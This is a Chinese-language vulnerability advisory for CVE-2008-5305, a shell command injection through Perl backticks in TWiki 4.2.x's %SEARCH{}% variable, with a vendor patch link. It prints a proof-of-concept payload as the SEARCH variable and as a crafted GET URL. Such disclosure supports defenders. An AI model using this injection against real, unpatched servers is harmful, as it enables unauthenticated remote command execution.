添加时间:
2008-12-12

系统编号:
WAVDB-01295
BugCVE: CVE-2008-5305
BUGTRAQ: 32668

影响版本:
4.2.x

程序介绍:

TWiki是一款灵活易用、功能强大的企业协作平台和知识管理系统。

漏洞分析:

由于没有正确地过滤对perl eval命令所传送的输入，远程攻击者可以通过向TWiki提交恶意的%SEARCH{}%变量或GET URL导致向Perl反引号（``）运算中注入并执行SHELL命令。如果没有对TWiki执行访问限制的话，攻击者无需认证便可以使用SEARCH变量。

漏洞利用:

%SEARCH{ date="P`pr -?`" search="xyzzy" }% 

http://example.org/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all

解决方案:
厂商补丁：
TWiki
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://twiki.org/cgi-bin/view/Codev/TWikiRelease04x02x04

信息来源:
<*来源：Troy Bollinger

链接：http://twiki.org/cgi-bin/view/Co ... 08-5305?cover=print
http://secunia.com/advisories/33040/
*>